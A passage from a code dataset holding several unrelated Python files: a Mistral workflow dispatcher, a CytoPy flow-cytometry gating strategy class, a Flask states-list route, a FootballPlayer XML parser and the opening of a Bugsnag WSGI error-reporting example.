ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport functools\nfrom osprofiler import profiler\n\nfrom mistral import exceptions as exc\nfrom mistral.workflow import commands\nfrom mistral.workflow import states\n\n\ndef _compare_task_commands(a, b):\n if not isinstance(a, commands.RunTask) or not a.is_waiting():\n return -1\n\n if not isinstance(b, commands.RunTask) or not b.is_waiting():\n return 1\n\n if a.unique_key == b.unique_key:\n return 0\n\n if a.unique_key < b.unique_key:\n return -1\n\n return 1\n\n\ndef _rearrange_commands(cmds):\n \"\"\"Takes workflow commands and does required pre-processing.\n\n The main idea of the method is to sort task commands with 'waiting'\n flag by 'unique_key' property in order guarantee the same locking\n order for them in parallel transactions and thereby prevent deadlocks.\n It also removes commands that don't make sense. 
For example, if\n there are some commands after a command that changes a workflow state\n then they must not be dispatched.\n \"\"\"\n\n # Remove all 'noop' commands.\n cmds = list([c for c in cmds if not isinstance(c, commands.Noop)])\n\n state_cmd_idx = -1\n state_cmd = None\n\n for i, cmd in enumerate(cmds):\n if isinstance(cmd, commands.SetWorkflowState):\n state_cmd_idx = i\n state_cmd = cmd\n\n break\n\n # Find a position of a 'fail|succeed|pause' command\n # and sort all task commands before it.\n if state_cmd_idx < 0:\n cmds.sort(key=functools.cmp_to_key(_compare_task_commands))\n\n return cmds\n elif state_cmd_idx == 0:\n return cmds[0:1]\n\n res = cmds[0:state_cmd_idx]\n\n res.sort(key=functools.cmp_to_key(_compare_task_commands))\n\n res.append(state_cmd)\n\n return res\n\n\n@profiler.trace('dispatcher-dispatch-commands', hide_args=True)\ndef dispatch_workflow_commands(wf_ex, wf_cmds):\n # TODO(rakhmerov): I don't like these imports but otherwise we have\n # import cycles.\n from mistral.engine import task_handler\n from mistral.engine import workflow_handler as wf_handler\n\n if not wf_cmds:\n return\n\n for cmd in _rearrange_commands(wf_cmds):\n if isinstance(cmd, (commands.RunTask, commands.RunExistingTask)):\n task_handler.run_task(cmd)\n elif isinstance(cmd, commands.SetWorkflowState):\n wf_handler.set_workflow_state(wf_ex, cmd.new_state, cmd.msg)\n else:\n raise exc.MistralError('Unsupported workflow command: %s' % cmd)\n\n if wf_ex.state != states.RUNNING:\n break\n","sub_path":"mistral/engine/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"530903533","text":"#!/usr/bin.env/python\n# -*- coding: utf-8 -*-\n\"\"\"\nIn a traditional analysis, an immunologist would apply a 'gating strategy';\na series of 'gates' that separate single cell data into the populations of\ninterest. 
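# A minimal standalone sketch of the comparator-based ordering used by
# _rearrange_commands above; the Command class here is a stand-in, not Mistral's.
import functools

class Command:
    def __init__(self, unique_key):
        self.unique_key = unique_key

def compare(a, b):
    # three-way comparison on unique_key, mirroring _compare_task_commands
    if a.unique_key == b.unique_key:
        return 0
    return -1 if a.unique_key < b.unique_key else 1

cmds = [Command("t3"), Command("t1"), Command("t2")]
cmds.sort(key=functools.cmp_to_key(compare))
print([c.unique_key for c in cmds])  # -> ['t1', 't2', 't3']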
CytoPy provides autonomous gates (see CytoPy.data.gate) to\nemulate this process and these gates can be packaged together for bulk\nanalysis using the GatingStrategy class, housed within this module.\n\nCopyright 2020 Ross Burton\n\nPermission is hereby granted, free of charge, to any person\nobtaining a copy of this software and associated documentation\nfiles (the \"Software\"), to deal in the Software without restriction,\nincluding without limitation the rights to use, copy, modify,\nmerge, publish, distribute, sublicense, and/or sell copies of the\nSoftware, and to permit persons to whom the Software is furnished\nto do so, subject to the following conditions:\nThe above copyright notice and this permission notice shall be included\nin all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\nEXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\nIN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\nCLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\nTORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\nSOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\nfrom ..flow.plotting import CreatePlot\nfrom ..feedback import progress_bar, vprint\nfrom .gate import Gate, ThresholdGate, PolygonGate, EllipseGate, ThresholdGeom, \\\n PolygonGeom, update_polygon, update_threshold\nfrom .experiment import Experiment\nfrom .fcs import FileGroup\nfrom datetime import datetime\nimport mongoengine\n\n__author__ = \"Ross Burton\"\n__copyright__ = \"Copyright 2020, CytoPy\"\n__credits__ = [\"Ross Burton\", \"Simone Cuff\", \"Andreas Artemiou\", \"Matthias Eberl\"]\n__license__ = \"MIT\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"Ross Burton\"\n__email__ = \"burtonrj@cardiff.ac.uk\"\n__status__ = \"Production\"\n\n\nclass Action(mongoengine.EmbeddedDocument):\n \"\"\"\n An Action represents a process applied to the gates/populations in some gating strategy\n that is independent of the gates themselves. At the moment this includes merging populations\n or subtracting one population from another. These actions can appear in a gating strategy\n and will be applied to new data in an autonomous fashion.\n\n Attributes\n ----------\n action_name: str\n Name of the action\n method: str\n Should have a value of \"merge\" or \"subtract\"\n left: str\n The population to merge on or subtract from\n right: str\n The population to merge with or be subtracted from 'left'\n new_population_name: str\n Name of the new population generated from this action\n \"\"\"\n action_name = mongoengine.StringField()\n method = mongoengine.StringField(choices=[\"merge\", \"subtract\"])\n left = mongoengine.StringField()\n right = mongoengine.StringField()\n new_population_name = mongoengine.StringField()\n\n\nclass GatingStrategy(mongoengine.Document):\n \"\"\"\n A GatingTemplate is synonymous to what an immunologist would classically consider\n a \"gating template\"; it is a collection of 'gates' (Gate objects, in the case of CytoPy)\n that can be applied to multiple fcs files or an entire experiment in bulk. 
A user defines\n a GatingTemplate using a single example from an experiment, uses the object to preview gates\n and label child populations, and when satisfied with the performance save the GatingStrategy\n to the database to be applied to the remaining samples in the Experiment.\n\n Attributes\n -----------\n template_name: str, required\n unique identifier for template\n gates: EmbeddedDocumentList\n list of Gate documents\n creation_date: DateTime\n date of creation\n last_edit: DateTime\n date of last edit\n flags: str, optional\n warnings associated to this gating template\n notes: str, optional\n free text comments\n \"\"\"\n name = mongoengine.StringField(required=True, unique=True)\n gates = mongoengine.ListField(mongoengine.ReferenceField(Gate, reverse_delete_rule=mongoengine.PULL))\n actions = mongoengine.EmbeddedDocumentListField(Action)\n creation_date = mongoengine.DateTimeField(default=datetime.now)\n last_edit = mongoengine.DateTimeField(default=datetime.now)\n flags = mongoengine.StringField(required=False)\n notes = mongoengine.StringField(required=False)\n meta = {\n 'db_alias': 'core',\n 'collection': 'gating_strategy'\n }\n\n def __init__(self, *args, **values):\n self.verbose = values.pop(\"verbose\", True)\n self.print = vprint(verbose=self.verbose)\n super().__init__(*args, **values)\n self.filegroup = None\n\n def load_data(self,\n experiment: Experiment,\n sample_id: str):\n \"\"\"\n Load a FileGroup into the GatingStrategy ready for gating.\n\n Parameters\n ----------\n experiment: Experiment\n sample_id: str\n\n Returns\n -------\n None\n \"\"\"\n self.filegroup = experiment.get_sample(sample_id=sample_id)\n\n def list_gates(self) -> list:\n \"\"\"\n List name of existing Gates\n\n Returns\n -------\n list\n \"\"\"\n return [g.gate_name for g in self.gates]\n\n def list_populations(self) -> list:\n \"\"\"\n Wrapper to FileGroup list_populations. 
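# A minimal usage sketch of the loading workflow just described; the experiment
# object and sample id are hypothetical placeholders, so the calls stay commented.
# gs = GatingStrategy(name="t_cell_panel")
# gs.load_data(experiment=my_experiment, sample_id="sample_001")
# print(gs.list_populations())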
Lists populations\n in associated FileGroup.\n\n Returns\n -------\n list\n \"\"\"\n assert self.filegroup is not None, \"No FileGroup associated\"\n return list(self.filegroup.list_populations())\n\n def _gate_exists(self,\n gate: str):\n \"\"\"\n Raises AssertionError if given gate does not exist\n\n Returns\n -------\n None\n \"\"\"\n assert gate in self.list_gates(), f\"Gate {gate} does not exist\"\n\n def get_gate(self,\n gate: str) -> Gate:\n \"\"\"\n Given the name of a gate, return the Gate object\n\n Parameters\n ----------\n gate: str\n\n Returns\n -------\n Gate\n \"\"\"\n self._gate_exists(gate=gate)\n return [g for g in self.gates if g.gate_name == gate][0]\n\n def preview_gate(self,\n gate: str or Gate or ThresholdGate or PolygonGate or EllipseGate,\n create_plot_kwargs: dict or None = None,\n plot_gate_kwargs: dict or None = None):\n \"\"\"\n Preview the results of some given Gate\n\n Parameters\n ----------\n gate: str or Gate or ThresholdGate or PolygonGate or EllipseGate\n Name of an existing Gate or a Gate object\n create_plot_kwargs: dict (optional)\n Additional arguments passed to CreatePlot\n plot_gate_kwargs: dict (optional)\n Additional arguments passed to plot_gate call of CreatePlot\n\n Returns\n -------\n Matplotlib.Axes\n \"\"\"\n create_plot_kwargs = create_plot_kwargs or {}\n plot_gate_kwargs = plot_gate_kwargs or {}\n if isinstance(gate, str):\n gate = self.get_gate(gate=gate)\n parent_data = self.filegroup.load_population_df(population=gate.parent,\n transform=None,\n label_downstream_affiliations=False)\n gate.fit(data=parent_data)\n plot = CreatePlot(**create_plot_kwargs)\n return plot.plot_gate_children(gate=gate,\n parent=parent_data,\n **plot_gate_kwargs)\n\n def apply_gate(self,\n gate: str or Gate or ThresholdGate or PolygonGate or EllipseGate,\n plot: bool = True,\n print_stats: bool = True,\n add_to_strategy: bool = True,\n create_plot_kwargs: dict or None = None,\n plot_gate_kwargs: dict or None = None):\n \"\"\"\n Apply a gate to the associated FileGroup. The gate must be previously defined;\n children associated and labeled. Either a Gate object can be provided or the name\n of an existing gate saved to this GatingStrategy.\n\n Parameters\n ----------\n gate: str or Gate or ThresholdGate or PolygonGate or EllipseGate\n Name of an existing Gate or a Gate object\n plot: bool (default=True)\n If True, returns a Matplotlib.Axes object of plotted gate\n print_stats: bool (default=True)\n If True, print gating statistics to stdout\n add_to_strategy: bool (default=True)\n If True, append the Gate to the GatingStrategy\n create_plot_kwargs: dict (optional)\n Additional arguments passed to CreatePlot\n plot_gate_kwargs: dict (optional)\n Additional arguments passed to plot_gate call of CreatePlot\n\n Returns\n -------\n Matplotlib.Axes or None\n \"\"\"\n if isinstance(gate, str):\n gate = self.get_gate(gate=gate)\n add_to_strategy = False\n if add_to_strategy:\n assert gate.gate_name not in self.list_gates(), \\\n f\"Gate with name {gate.gate_name} already exists. 
To continue set add_to_strategy to False\"\n create_plot_kwargs = create_plot_kwargs or {}\n plot_gate_kwargs = plot_gate_kwargs or {}\n parent_data = self.filegroup.load_population_df(population=gate.parent,\n transform=None,\n label_downstream_affiliations=False)\n if gate.ctrl is None:\n populations = gate.fit_predict(data=parent_data)\n else:\n populations = self._control_gate(gate=gate)\n for p in populations:\n self.filegroup.add_population(population=p)\n if print_stats:\n print(f\"----- {gate.gate_name} -----\")\n parent_n = parent_data.shape[0]\n print(f\"Parent ({gate.parent}) n: {parent_n}\")\n for p in populations:\n print(f\"...child {p.population_name} n: {p.n}; {p.n / parent_n * 100}% of parent\")\n print(\"------------------------\")\n if add_to_strategy:\n self.gates.append(gate)\n if plot:\n plot = CreatePlot(**create_plot_kwargs)\n return plot.plot_population_geoms(parent=parent_data,\n children=populations,\n **plot_gate_kwargs)\n return None\n\n def apply_all(self,\n verbose: bool = True):\n \"\"\"\n Apply all the gates associated to this GatingStrategy\n\n Parameters\n ----------\n verbose: bool (default=True)\n If True, print feedback to stdout\n\n Returns\n -------\n None\n \"\"\"\n feedback = vprint(verbose)\n populations_created = [[c.name for c in g.children] for g in self.gates]\n populations_created = [x for sl in populations_created for x in sl]\n assert len(self.gates) > 0, \"No gates to apply\"\n err = \"One or more of the populations generated from this gating strategy are already \" \\\n \"presented in the population tree\"\n assert all([x not in self.list_populations() for x in populations_created]), err\n gates_to_apply = list(self.gates)\n actions_to_apply = list(self.actions)\n i = 0\n iteration_limit = len(gates_to_apply) * 100\n feedback(\"=====================================================\")\n while len(gates_to_apply) > 0:\n if i >= len(gates_to_apply):\n i = 0\n gate = gates_to_apply[i]\n if gate.parent in self.list_populations():\n feedback(f\"------ Applying {gate.gate_name} ------\")\n self.apply_gate(gate=gate,\n plot=False,\n print_stats=verbose,\n add_to_strategy=False)\n feedback(\"----------------------------------------\")\n gates_to_apply = [g for g in gates_to_apply if g.gate_name != gate.gate_name]\n actions_applied_this_loop = list()\n for a in actions_to_apply:\n if a.left in self.list_populations() and a.right in self.list_populations():\n feedback(f\"------ Applying {a.action_name} ------\")\n self.apply_action(action=a,\n print_stats=verbose,\n add_to_strategy=False)\n feedback(\"----------------------------------------\")\n actions_applied_this_loop.append(a.action_name)\n actions_to_apply = [a for a in actions_to_apply\n if a.action_name not in actions_applied_this_loop]\n i += 1\n iteration_limit -= 1\n assert iteration_limit > 0, \"Maximum number of iterations reached. 
This means that one or more parent \" \\\n \"populations are not being identified.\"\n\n def delete_actions(self,\n action_name: str):\n \"\"\"\n Delete an action associated to this GatingStrategy\n\n Parameters\n ===========\n action_name: str\n\n Returns\n -------\n None\n \"\"\"\n self.actions = [a for a in self.actions if a.action_name != action_name]\n\n def apply_action(self,\n action: Action or str,\n print_stats: bool = True,\n add_to_strategy: bool = True):\n \"\"\"\n Apply an action, that is, a merge or subtraction:\n * Merge: merge two populations present in the current population tree.\n The merged population will have the combined index of both populations but\n will not inherit any clusters and will not be associated to any children\n downstream of either the left or right population. The population will be\n added to the tree as a descendant of the left populations parent\n * Subtraction: subtract the right population from the left population.\n The right population must either have the same parent as the left population\n or be downstream of the left population. The new population will descend from\n the same parent as the left population. The new population will have a\n PolygonGeom geom.\n\n Parameters\n ----------\n action: Action\n print_stats: bool (default=True)\n Print population statistics to stdout\n add_to_strategy: bool (default=True)\n Add action to this GatingStrategy\n Returns\n -------\n None\n \"\"\"\n if isinstance(action, str):\n matching_action = [a for a in self.actions if a.action_name == action]\n assert len(matching_action) == 1, f\"{action} does not exist\"\n action = matching_action[0]\n assert action.method in [\"merge\", \"subtract\"], \"Accepted methods are: merge, subtract\"\n assert action.left in self.list_populations(), f\"{action.left} does not exist\"\n assert action.right in self.list_populations(), f\"{action.right} does not exist\"\n left = self.filegroup.get_population(action.left)\n right = self.filegroup.get_population(action.right)\n if action.method == \"merge\":\n self.filegroup.merge_populations(left=left,\n right=right,\n new_population_name=action.new_population_name)\n else:\n self.filegroup.subtract_populations(left=left,\n right=right,\n new_population_name=action.new_population_name)\n if print_stats:\n new_pop_name = action.new_population_name or f\"{action.method}_{left.population_name}_{right.population_name}\"\n new_pop = self.filegroup.get_population(population_name=new_pop_name)\n print(f\"------ {action.action_name} ------\")\n parent_n = self.filegroup.get_population(left.parent).n\n print(f\"Parent ({left.parent}) n: {parent_n}\")\n print(f\"Left pop ({left.population_name}) n: {left.n}; {left.n / parent_n * 100}%\")\n print(f\"Right pop ({right.population_name}) n: {right.n}; {right.n / parent_n * 100}%\")\n print(f\"New population n: {new_pop.n}; {new_pop.n / parent_n * 100}%\")\n print(\"-----------------------------------\")\n if add_to_strategy:\n self.actions.append(action)\n\n def delete_gate(self,\n gate_name: str):\n \"\"\"\n Remove a gate from this GatingStrategy. Note: populations generated from this\n gate will not be deleted. These populations must be deleted separately by calling\n the 'delete_population' method.\n\n Parameters\n ----------\n gate_name: str\n Name of the gate for removal\n Returns\n -------\n None\n \"\"\"\n self.gates = [g for g in self.gates if g.gate_name != gate_name]\n\n def delete_populations(self,\n populations: str or list):\n \"\"\"\n Delete given populations. 
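# Sketch of driving the merge/subtract machinery described above; the population
# names are hypothetical and 'gs' stands for a GatingStrategy with data loaded.
# action = Action(action_name="merge_t_cells", method="merge",
#                 left="CD4+ T cells", right="CD8+ T cells",
#                 new_population_name="T cells")
# gs.apply_action(action=action, print_stats=True, add_to_strategy=True)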
Populations downstream from delete population(s) will\n also be removed.\n\n Parameters\n ----------\n populations: list or str\n Either a list of populations (list of strings) to remove or a single population as a string.\n If a value of \"all\" is given, all populations are dropped.\n\n Returns\n -------\n None\n \"\"\"\n self.filegroup.delete_populations(populations=populations)\n\n def plot_gate(self,\n gate: str,\n create_plot_kwargs: dict or None = None,\n **kwargs):\n \"\"\"\n Plot a gate. Must provide the name of a Gate currently associated to this GatingStrategy.\n This will plot the parent population this gate acts on along with the geometries\n that define the child populations the gate generates.\n\n Parameters\n ----------\n gate: str or Gate or EllipseGate or ThresholdGate or PolygonGate\n create_plot_kwargs: dict\n Keyword arguments for CreatePlot object. See CytoPy.plotting.CreatePlot for details.\n kwargs:\n Keyword arguments for plot_gate call.\n See CytoPy.plotting.CreatePlot.plot_population_geom for details.\n\n Returns\n -------\n Matplotlib.Axes\n \"\"\"\n create_plot_kwargs = create_plot_kwargs or {}\n assert isinstance(gate, str), \"Provide the name of an existing Gate in this GatingStrategy\"\n assert gate in self.list_gates(), \\\n f\"Gate {gate} not recognised. Have you applied it and added it to the strategy?\"\n gate = self.get_gate(gate=gate)\n parent = self.filegroup.load_population_df(population=gate.parent,\n transform=None,\n label_downstream_affiliations=False)\n plotting = CreatePlot(**create_plot_kwargs)\n return plotting.plot_population_geoms(parent=parent,\n children=[self.filegroup.get_population(c.name)\n for c in gate.children],\n **kwargs)\n\n def plot_backgate(self,\n parent: str,\n overlay: list,\n x: str,\n y: str or None = None,\n create_plot_kwargs: dict or None = None,\n **backgate_kwargs):\n \"\"\"\n Given some population as the backdrop (parent) and a list of one or more\n populations that occur downstream of the parent (overlay), plot the downstream\n populations as scatter plots over the top of the parent.\n\n Parameters\n ----------\n parent: str\n overlay: list\n x: str\n y: str\n create_plot_kwargs\n Additional keyword arguments passed to CytoPy.flow.plotting.CreatePlot\n backgate_kwargs\n Additional keyword arguments passed to CytoPy.flow.plotting.CreatePlot.backgate\n\n Returns\n -------\n Matplotlib.Axes\n \"\"\"\n assert parent in self.list_populations(), \"Parent population does not exist\"\n assert all([x in self.list_populations() for x in overlay]), \"One or more given populations could not be found\"\n downstream = self.filegroup.list_downstream_populations(population=parent)\n assert all([x in downstream for x in overlay]), \\\n \"One or more of the given populations is not downstream of the given parent\"\n plotting = CreatePlot(**create_plot_kwargs)\n parent = self.filegroup.load_population_df(population=parent,\n transform=None,\n label_downstream_affiliations=False)\n children = {x: self.filegroup.load_population_df(population=x,\n transform=None,\n label_downstream_affiliations=False)\n for x in overlay}\n return plotting.backgate(parent=parent,\n children=children,\n x=x,\n y=y,\n **backgate_kwargs)\n\n def plot_population(self,\n population: str,\n x: str,\n y: str or None = None,\n transform_x: str or None = \"logicle\",\n transform_y: str or None = \"logicle\",\n create_plot_kwargs: dict or None = None,\n **plot_kwargs):\n \"\"\"\n Plot an existing population in the associate FileGroup.\n\n Parameters\n ----------\n 
population: str\n x: str\n y: str (optional)\n transform_x: str (optional; default=\"logicle\")\n transform_y: str (optional; default=\"logicle\")\n create_plot_kwargs:\n Additional keyword arguments passed to CytoPy.flow.plotting.CreatePlot\n plot_kwargs\n Additional keyword arguments passed to CytoPy.flow.plotting.CreatePlot.plot\n\n Returns\n -------\n Matplotlib.Axes\n \"\"\"\n assert population in self.list_populations(), f\"{population} does not exist\"\n data = self.filegroup.load_population_df(population=population,\n transform=None,\n label_downstream_affiliations=False)\n create_plot_kwargs = create_plot_kwargs or {}\n plotting = CreatePlot(transform_x=transform_x,\n transform_y=transform_y,\n **create_plot_kwargs)\n return plotting.plot(data=data, x=x, y=y, **plot_kwargs)\n\n def print_population_tree(self, **kwargs):\n \"\"\"\n Print the population tree to stdout.\n Wraps CytoPy.data.fcs.FileGroup.print_population_tree\n\n Parameters\n ----------\n kwargs\n See keyword arguments for CytoPy.data.fcs.FileGroup.print_population_tree\n\n Returns\n -------\n None\n \"\"\"\n self.filegroup.print_population_tree(**kwargs)\n\n def edit_gate(self,\n gate_name: str,\n x_threshold: float or None = None,\n y_threshold: float or None = None,\n x_values: list or None = None,\n y_values: list or None = None):\n \"\"\"\n Edit an existing gate (i.e. the polygon or threshold shape that generates the resulting\n populations). The altered geometry will be applied to the parent population resulting\n this gate acts upon, resulting in new data. Populations downstream of this edit will\n also be effected but gates will not adapt dynamically, instead the static results of\n gating algorithms will still apply, but to a new dataset. For this reason, gates\n should be checked (similar to the effects of moving a gate in FlowJo).\n\n Parameters\n ----------\n gate_name: str\n x_threshold: float (optional)\n Required for threshold geometries\n y_threshold: float (optional)\n Required for 2D threshold geometries\n x_values: list\n Required for Polygon geometries\n y_values\n Required for Polygon geometries\n Returns\n -------\n None\n \"\"\"\n gate = self.get_gate(gate=gate_name)\n err = \"Cannot edit a gate that has not been applied; gate children not present in population \" \\\n \"tree.\"\n assert all([x in self.filegroup.tree.keys() for x in [c.name for c in gate.children]]), err\n transforms = [gate.transformations.get(x, None) for x in [\"x\", \"y\"]]\n transforms = {k: v for k, v in zip([gate.x, gate.y], transforms) if k is not None}\n parent = self.filegroup.load_population_df(population=gate.parent,\n transform=transforms)\n for child in gate.children:\n pop = self.filegroup.get_population(population_name=child.name)\n if isinstance(pop.geom, ThresholdGeom):\n assert x_threshold is not None, \"For threshold geometry, please provide x_threshold\"\n if pop.geom.y_threshold is not None:\n assert y_threshold is not None, \"For 2D threshold geometry, please provide y_threshold\"\n update_threshold(population=pop,\n parent_data=parent,\n x_threshold=x_threshold,\n y_threshold=y_threshold)\n elif isinstance(pop.geom, PolygonGeom):\n assert x_values is not None and y_values is not None, \\\n \"For polygon gate please provide x_values and y_values\"\n update_polygon(population=pop,\n parent_data=parent,\n x_values=x_threshold,\n y_values=y_threshold)\n self._edit_downstream_effects(population_name=child.name)\n\n def _edit_downstream_effects(self,\n population_name: str):\n \"\"\"\n Echos the downstream 
effects of an edited gate by iterating over the Population\n dependencies and reapplying their geometries to the modified data. Should be\n called after 'edit_population'.\n\n Parameters\n ----------\n population_name: str\n\n Returns\n -------\n None\n \"\"\"\n downstream_populations = self.filegroup.list_downstream_populations(population=population_name)\n for pop in downstream_populations:\n pop = self.filegroup.get_population(pop)\n transforms = {k: v for k, v in zip([pop.geom.x, pop.geom.y],\n [pop.geom.transform_x, pop.geom.transform_y])\n if k is not None}\n parent = self.filegroup.load_population_df(population=pop.parent,\n transform=transforms)\n if isinstance(pop.geom, ThresholdGeom):\n update_threshold(population=pop,\n parent_data=parent,\n x_threshold=pop.geom.x_threshold,\n y_threshold=pop.geom.y_threshold)\n elif isinstance(pop.geom, PolygonGeom):\n update_polygon(population=pop,\n parent_data=parent,\n x_values=pop.geom.x_values,\n y_values=pop.geom.y_values)\n\n def _control_gate(self,\n gate: Gate or ThresholdGate or PolygonGate or EllipseGate):\n \"\"\"\n Internal method for applying a gate using control data. Will first attempt to fetch the parent\n population for the control data (see CytoPy.data.fcs.FileGroup.load_ctrl_population_df)\n and then will fit the gate to this data. The resulting gate will be applied statically to\n the parent population from the primary data.\n\n Parameters\n ----------\n gate: Gate or ThresholdGate or PolygonGate or EllipseGate\n\n Returns\n -------\n list\n List of Populations\n \"\"\"\n assert gate.ctrl in self.filegroup.controls, f\"FileGroup does not have data for {gate.ctrl}\"\n ctrl_parent_data = self.filegroup.load_ctrl_population_df(ctrl=gate.ctrl,\n population=gate.parent,\n transform=None)\n # Fit control data\n populations = gate.fit_predict(data=ctrl_parent_data)\n updated_children = list()\n for p in populations:\n eq_child = [c for c in gate.children if c.name == p.population_name]\n assert len(eq_child) == 1, \"Invalid gate. Estimated populations do not match children.\"\n eq_child = eq_child[0]\n eq_child.geom = p.geom\n updated_children.append(eq_child)\n gate.children = updated_children\n # Predict original data\n parent_data = self.filegroup.load_population_df(population=gate.parent,\n transform=None,\n label_downstream_affiliations=False)\n return gate.fit_predict(data=parent_data)\n\n def save(self, *args, **kwargs):\n \"\"\"\n Save GatingStrategy and the populations generated for the associated\n FileGroup.\n\n Parameters\n ----------\n args:\n Positional arguments for mongoengine.document.save call\n kwargs:\n Keyword arguments for mongoengine.document.save call\n\n Returns\n -------\n None\n \"\"\"\n for g in self.gates:\n g.save()\n super().save(*args, **kwargs)\n if self.name not in self.filegroup.gating_strategy:\n self.filegroup.gating_strategy.append(self.name)\n if self.filegroup is not None:\n self.filegroup.save()\n\n def delete(self,\n delete_gates: bool = True,\n remove_associations: bool = True,\n *args, **kwargs):\n \"\"\"\n Delete gating strategy. If delete_gates is True, then associated Gate objects will\n also be deleted. 
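# Sketch of the gate-editing flow described above; the gate name and threshold
# values are hypothetical, and 'gs' stands for a GatingStrategy with data loaded.
# gs.edit_gate("cd3_threshold", x_threshold=0.45, y_threshold=0.2)
# gs.print_population_tree()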
If remove_associations is True, then populations generated from\n this gating strategy will also be deleted.\n\n Parameters\n ----------\n delete_gates: bool (default=True)\n remove_associations: (default=True)\n args:\n Positional arguments for mongoengine.document.delete call\n kwargs:\n Keyword arguments for mongoengine.document.delete call\n\n Returns\n -------\n\n \"\"\"\n super().delete(*args, **kwargs)\n populations = [[c.name for c in g.children] for g in self.gates]\n populations = list(set([x for sl in populations for x in sl]))\n if delete_gates:\n self.print(\"Deleting gates...\")\n for g in self.gates:\n g.delete()\n if remove_associations:\n self.print(\"Deleting associated populations in FileGroups...\")\n for f in progress_bar(FileGroup.objects(), verbose=self.verbose):\n if self.name in f.gating_strategy:\n f.gating_strategy = [gs for gs in f.gating_strategy if gs != self.name]\n f.delete_populations(populations=populations)\n f.save()\n self.print(f\"{self.name} successfully deleted.\")\n","sub_path":"CytoPy/data/gating_strategy.py","file_name":"gating_strategy.py","file_ext":"py","file_size_in_byte":32569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"246623815","text":"#!/usr/bin/python3\n'''\nmodule states\n'''\nfrom flask import Flask\nfrom flask import render_template\nfrom models import storage\nfrom models.state import State\n\napp = Flask(__name__)\n\n\n@app.route('/states_list', strict_slashes=False)\ndef states_list():\n ''' states list '''\n states_dict = storage.all(State)\n states = []\n for k, v in states_dict.items():\n states.append(v)\n print(states)\n return render_template('7-states_list.html', states=states)\n\n\n@app.teardown_appcontext\ndef teardown_db(self):\n ''' teardown_db '''\n storage.close()\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000)\n","sub_path":"web_flask/7-states_list.py","file_name":"7-states_list.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"640108454","text":"\"\"\"\nCreated on Fri Sep 25 2020\n\nAn implementation of Player to define a Football player.\n\nUnlike other subclasses this one defines a lot of stuff since we need to know a lot of information about Football\nPlayers\n\n@author: alexa\n\"\"\"\n\nfrom player.player import Player\n\n\nclass FootballPlayer(Player):\n \"\"\"\n Defines a Football Player. Besides the basic attributes set by the Player class we'll have plenty of\n attributes which define characteristics rather specific to football\n\n Attributes\n ----------\n name : str\n The player's name\n nationality : str\n The player's nationality\n strength : int\n The player's overall strength, or talent when it comes to playing Football. Defined with a\n basic scale going from 0 to 100 in mind, where the average Football player in one of Europe's\n top leagues (England/Spain/Germany/Italy) would be around 75\n penaltyTaker : bool\n Indicates if the player normally takes penalties\n positionAbilities : list of float\n The list of ability of the player to play at each post. Contains 4 elements: the ability to\n play as a goalkeeper, defender, midfielder and forward, respectively. The abilities are\n multipliers ranging from 0 to 1 (both included). 
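# The states_list view above builds its list with an explicit loop; since
# storage.all(State) returns a dict, the same result can be written in one line
# (the sort assumes State exposes a 'name' attribute):
# states = sorted(storage.all(State).values(), key=lambda s: s.name)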
If ability for a post is >0, then the player\n can play at this position and his strength there will be position ability * strength\n goalsScored : int\n Number of goals scored by the player\n\n Methods\n -------\n Will probably need something to help a Team convert to XML (the team will need the player's data)\n increaseGS : int -> None\n Increases goalsScored by the quantity given in attribute\n resetGoals : None -> None\n Resets goalScored to 0\n \"\"\"\n\n def __init__(self, player_data):\n \"\"\"\n Initializes a FootballPlayer from data given by the FootballClub constructor, which reads an XML file\n\n Parameters\n ----------\n player_data : xml.etree.ElementTree.Element\n The data defining the player as read in then XML file. It's an XML node\n\n Returns\n -------\n FootballPlayer\n The initialized FootballPlayer\n \"\"\"\n super().__init__(player_data)\n self.strength = 0\n self.penaltyTaker = False\n self.positionAbilities = [0, 0, 0, 0]\n self.goalsScored = 0\n\n raw_elements = list(player_data)\n for e in raw_elements:\n if e.tag == 'name':\n self.name = e.text\n elif e.tag == 'country':\n self.nationality = e.text\n elif e.tag == 'strength':\n self.strength = int(e.text)\n elif e.tag == 'pen_shooter':\n self.penaltyTaker = (e.text == \"Yes\")\n elif e.tag == 'goals':\n self.goalsScored = int(e.text)\n elif e.tag == 'gk_ability':\n self.positionAbilities[0] = float(e.text)\n elif e.tag == 'df_ability':\n self.positionAbilities[1] = float(e.text)\n elif e.tag == 'md_ability':\n self.positionAbilities[2] = float(e.text)\n elif e.tag == 'fw_ability':\n self.positionAbilities[3] = float(e.text)\n else:\n print(\"Unknown data in the player data ! Ignoring....\")\n","sub_path":"player/football_player.py","file_name":"football_player.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"83748616","text":"#!/usr/bin/env python\n\nimport bugsnag\nfrom werkzeug.wrappers import Request, Response\nfrom bugsnag.wsgi.middleware import BugsnagMiddleware\n\nfrom wsgiref.simple_server import make_server\nfrom cgi import parse_qs, escape\n\n# Create our wsgi app\ndef application(environ, start_response):\n if environ.get('PATH_INFO', '') == \"/\":\n d = parse_qs(environ['QUERY_STRING'])\n\n bugsnag.notify(RuntimeError('octopus'))\n start_response('200 OK', [('Content-Type', 'text/html')])\n raise Exception(\"Something broke\")\n\n return [\"Some output here\"]\n\n elif environ.get('PATH_INFO', '') 